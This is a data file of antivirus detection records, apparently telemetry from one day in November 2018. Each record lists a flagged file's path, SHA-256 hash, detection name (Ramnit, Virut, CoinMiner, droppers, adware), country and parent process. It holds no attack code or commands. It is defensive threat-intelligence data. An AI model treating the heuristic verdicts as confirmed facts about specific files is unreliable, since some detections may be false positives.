  Row(detection=Row(filename='1.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rarsfx1\\1.exe', filesize=1792000, name='HEUR/APC.#M1.#R1'), hash='4a2b3eb2d63ba8c05df30e1702786634f69490f9ce6a3fdeb19b4829b7482f00', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=302592, timestamp='2018-11-04T19:02:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-020317-4eb9b21d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0a311ac5\\AVSCAN-20181105-020219-474F587D\\AVSCAN-20181105-020317-4EB9B21D', filesize=1792000, name='HEUR/APC.#M1.#R1'), hash='4a2b3eb2d63ba8c05df30e1702786634f69490f9ce6a3fdeb19b4829b7482f00', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:03:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='languageid finder.exe', filepath='C:\\Program Files (x86)\\RocketDock\\Tools\\LanguageID Finder.exe', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a86dfb1303bcd41fe67c92795f113ddbeb641e9d561accc80aa447a10f40358', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T05:11:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='languageid finder.exe', filepath='C:\\Program Files (x86)\\RocketDock\\Tools\\LanguageID Finder.exe', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a86dfb1303bcd41fe67c92795f113ddbeb641e9d561accc80aa447a10f40358', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T10:35:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='languageid finder.exe', filepath='C:\\Program Files (x86)\\RocketDock\\Tools\\LanguageID Finder.exe', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a86dfb1303bcd41fe67c92795f113ddbeb641e9d561accc80aa447a10f40358', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T12:31:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='chekraid.exe', filepath='C:\\SYSTEM.SAV\\util\\ChekRaid.exe', filesize=192000, name='HEUR/AGEN.1014163.#M1.#R1'), hash='4ad4aa15337e64c3737556187a28f047fe900c106b402e26f4dd0a4edc51c1e4', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Norton Security\\Engine\\22.16.0.247\\NortonSecurity.exe', parentsize=328648, timestamp='2018-11-04T11:45:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160804-5dabab7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_868ea106\\AVSCAN-20181104-160703-54C26916\\AVSCAN-20181104-160804-5DABAB7D', filesize=192000, name='HEUR/AGEN.1014163.#M1.#R1'), hash='4ad4aa15337e64c3737556187a28f047fe900c106b402e26f4dd0a4edc51c1e4', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:08:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unt591a.tmp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\U5919.tmp\\UNT591A.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='4affd24c9f82a4b944e5341be867198ae6877557d7f1f50d6618ca2cbb7f6c91', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T21:05:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unt591a.tmp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\U5919.tmp\\UNT591A.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='4affd24c9f82a4b944e5341be867198ae6877557d7f1f50d6618ca2cbb7f6c91', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T18:28:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0.exe', filepath='G:\\العـــاب11\\Snowmobile Championship\\0.EXE', filesize=1728000, name='W32/Virut.Gen.#M1.#R1'), hash='4b25059faeb7ca2aae19fa3cb85646630ced9cdc3e5835077ae6b817a01f2a62', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T14:41:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='w3l.exe', filepath='C:\\Program Files (x86)\\Warcraft III\\w3l.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='4b779d8415e51bfe0fa64fe7515fb46db76bd2b7ca0d05411f4a46578e149c8b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:RV5qOrXV50Op+if9.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T12:02:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124539-c25bb862', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_949c51c9\\AVSCAN-20181104-114243-D1379150\\AVSCAN-20181104-124539-C25BB862', filesize=1336000, name='PUA/InstallCore.#M1.#R1'), hash='4ba0876fef0855708223e1ccd6ba78e35e0cb264716caf88703ab50aec1935bb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:45:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-115708-087577b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_949c51c9\\AVSCAN-20181104-114243-D1379150\\AVSCAN-20181104-115708-087577B5', filesize=1336000, name='PUA/InstallCore.#M1.#R1'), hash='4ba0876fef0855708223e1ccd6ba78e35e0cb264716caf88703ab50aec1935bb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:57:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-115719-0929508d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_949c51c9\\AVSCAN-20181104-114243-D1379150\\AVSCAN-20181104-115719-0929508D', filesize=1336000, name='PUA/InstallCore.#M1.#R1'), hash='4ba0876fef0855708223e1ccd6ba78e35e0cb264716caf88703ab50aec1935bb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:57:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003420.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003420.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='4c449dd83890f87f4ad8d5fe8eeb44165013e2f9dd0098954de0d44b3828ab5d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='08_2013_creditreport.pdf.zip --> 08_2013_creditreport.pdf.exe', filepath='08_2013_creditreport.pdf.zip --> 08_2013_creditreport.pdf.exe', filesize=128000, name='HEUR/AGEN.1008096.#M15.#R1008096'), hash='4cc4ab82dd1a81fee2f997eef4e81b806cefb6d53e77e94dea3c0318e9fc85af', metadata=Row(cmdline=None, country='GB', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:08:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='image11412.jpg', filepath='C:\\Users\\X\\Pictures\\image11412.JPG', filesize=19456000, name='DR/FakePic.Gen.#M1.#R1'), hash='4d7732d3c2a2bd9f02ce68c0960bf5f3c154e62766976bf4fc9bf0638cb91efb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe24_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe24 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T18:44:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='4d778157f4ff4a96304503cad4e99acb2836ca50b089c72d4b72aed38832779a', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:15:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='4d778157f4ff4a96304503cad4e99acb2836ca50b089c72d4b72aed38832779a', metadata=Row(cmdline='\\\\\\/Embedding', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T08:13:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172855-425f87b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8092673d\\AVSCAN-20181101-023524-08855CD5\\AVSCAN-20181104-172855-425F87B5', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='4db969b4b642d10e55a99d3d805e1c6a1bf100ba926f4649b0b101d94f4eb883', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:28:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4e5c74d6ebccaed2b7d4db4484713fdba97f0f30c309683170c340d6d050f650', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T17:41:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165835-3f56ff44', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-155710-6095B825\\AVSCAN-20181104-165835-3F56FF44', filesize=256000, name='TR/AD.Inject.Y.#M1.#R1'), hash='4ef0a023932d5f073dd817ae3a7b569f22edbed4afc4e6728f7dcc5884584283', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:58:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165917-ebb0c758', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-155710-6095B825\\AVSCAN-20181104-165917-EBB0C758', filesize=256000, name='TR/AD.Inject.Y.#M1.#R1'), hash='4ef0a023932d5f073dd817ae3a7b569f22edbed4afc4e6728f7dcc5884584283', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:59:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220934-613ac257', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_70e1c465\\AVSCAN-20181104-214728-EDBACF48\\AVSCAN-20181104-220934-613AC257', filesize=492000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='501f415c7c26299c4f6ab9c79bda7a060ee8f308886e0cadbbadf47036951df3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:09:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unrar.exe', filepath='C:\\Program Files (x86)\\WinRAR\\UnRAR.exe', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='51f05e67de195aa9ccfb154716f37be3014d31144102385acbb2c70fb51b0404', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:oL23CjqHnky4RGdq.1', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T16:36:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103201-5763304e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-103131-53CE8643\\AVSCAN-20181104-103201-5763304E', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:32:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\PC Faster\\5.1.0.0\\Cloud Security\\BCloudScan.exe', parentsize=2265456, timestamp='2018-11-04T15:10:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T09:30:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180117-e7aff50e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d4c3524\\AVSCAN-20181104-175811-D1085C03\\AVSCAN-20181104-180117-E7AFF50E', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:01:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135104-2d7a8cc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b2055eb\\AVSCAN-20181104-134144-E9320359\\AVSCAN-20181104-135104-2D7A8CC9', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='522205966738ddc518dd98c29751910064e0c415c6081c2263e4c4ddee0046a8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:50:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='522205966738ddc518dd98c29751910064e0c415c6081c2263e4c4ddee0046a8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:50:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='522205966738ddc518dd98c29751910064e0c415c6081c2263e4c4ddee0046a8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:51:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='522205966738ddc518dd98c29751910064e0c415c6081c2263e4c4ddee0046a8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:50:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wgamecfg.exe', filepath='E:\\الــعـــاب 1\\الــعــاب بــيــت الــمــوت\\بــيــت الــمــوت 1\\WGAMECFG.EXE', filesize=64000, name='HEUR/AGEN.1015942.#M1.#R1'), hash='52a2024f3695ba688d2340ea07e55eb2a5dc274af41d4e4dcbfcc49bb53f8231', metadata=Row(cmdline='rtp', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1903696, timestamp='2018-11-04T19:54:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215721-348ded59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41ed2522\\AVSCAN-20181104-215535-21FF7B6F\\AVSCAN-20181104-215721-348DED59', filesize=64000, name='HEUR/AGEN.1015942.#M1.#R1'), hash='52a2024f3695ba688d2340ea07e55eb2a5dc274af41d4e4dcbfcc49bb53f8231', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:57:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ndp46-kb3045557-x86-x64-allos-enu.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\DotNet\\NDP46-KB3045557-x86-x64-AllOS-ENU.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='52d8475c5be4f6e846c1f874db950e23ed62d61eab5235715fdaf5b4917ada19', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:28:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ufcgetvf.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Ulead Systems\\Ulead VideoStudio SE DVD\\ufcGetVF.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='52e5f3c36713991b5258abf76f5cc49856b5aa9c8b3fada2a672f1375b847c82', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:19:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ufcgetvf.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Ulead Systems\\Ulead VideoStudio SE DVD\\ufcGetVF.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='52e5f3c36713991b5258abf76f5cc49856b5aa9c8b3fada2a672f1375b847c82', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:19:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-092347-dc642c8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1683e6be\\AVSCAN-20181104-090613-498D57A5\\AVSCAN-20181104-092347-DC642C8B', filesize=640000, name='TR/AD.Nymaim.Y.#M1.#R1'), hash='5308c357f63aeed4a0ac407a08378dc3fda18f6fe4482731507c4b075c49fdc6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:23:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='steam_client_bruteforce.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXb0.095\\Steam_Client_Bruteforce.exe', filesize=448000, name='TR/Dropper.MSIL.Gen.#M300.#R5111'), hash='53b707ff616b7c1a8d13790af4d12051ca2e803626e9fcc93a09b13f35e370cb', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Compressed\\\\\\\\Steam_Client_Bruteforce.zip\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1551248, timestamp='2018-11-04T09:05:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111333-ca5c5037', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56777924\\AVSCAN-20181104-111320-C816040E\\AVSCAN-20181104-111333-CA5C5037', filesize=448000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='53b707ff616b7c1a8d13790af4d12051ca2e803626e9fcc93a09b13f35e370cb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:13:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111345-cc8a3f14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56777924\\AVSCAN-20181104-111320-C816040E\\AVSCAN-20181104-111345-CC8A3F14', filesize=448000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='53b707ff616b7c1a8d13790af4d12051ca2e803626e9fcc93a09b13f35e370cb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:13:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111353-ce03106f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56777924\\AVSCAN-20181104-111320-C816040E\\AVSCAN-20181104-111353-CE03106F', filesize=448000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='53b707ff616b7c1a8d13790af4d12051ca2e803626e9fcc93a09b13f35e370cb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:13:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='allplan_start.exe', filepath='C:\\adobeTemp\\ETRB7B1.tmp\\1\\universal\\Professional\\Support Files\\Plug-ins\\MAXON CINEWARE AE\\(CINEWARE Support)\\bin\\resource\\modules\\objects\\allplan_start.exe', filesize=256000, name='W32/Infector.Gen8.#M300.#R700734'), hash='53e544ffea2aebbfec094fdb22d1ad7d7d5c8f7fc0efee4ec1660eb1d65fe448', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-04T17:56:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='chicken invaders 4.exe', filepath='E:\\NooN Games\\AutoPlay\\Temp\\Chicken Invaders 4\\Chicken Invaders 4.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='54ead74adf7ed441519196511e4d9d56a7cdeab303ecefe02193ed3c12917845', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:xHncDj\\\\\\/woky0BtZQ.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T02:23:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00008e3b', filepath='C:\\Windows\\Temp\\d9e6d037-1454-4f52-9896-6d70fa38db9d\\tmp00000381\\tmp00008e3b', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='550a1e283f1737e8073662abcbcf73d5ff5e484f81925b24e576b8129b4200e5', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.930.11587\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T11:04:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132156-cb5598a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4ba32583\\AVSCAN-20181104-123253-424E92FB\\AVSCAN-20181104-132156-CB5598A6', filesize=128000, name='PUA/Outbrowse.Gen.#M1.#R1'), hash='555ac4eaff7b8bcf964d627b5e4a497896a066eda5217c2ef82796731722f600', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='frghw.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsf3582.tmp\\frghw.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M300.#R5697'), hash='555ac4eaff7b8bcf964d627b5e4a497896a066eda5217c2ef82796731722f600', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:36:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173727-614243ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173727-614243AB', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:37:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153442-bd97d7a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-153442-BD97D7A4', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:34:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172243-c6e82bcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-172243-C6E82BCD', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:22:43Z'), dt=datetime.date(2018, 11, 4)),
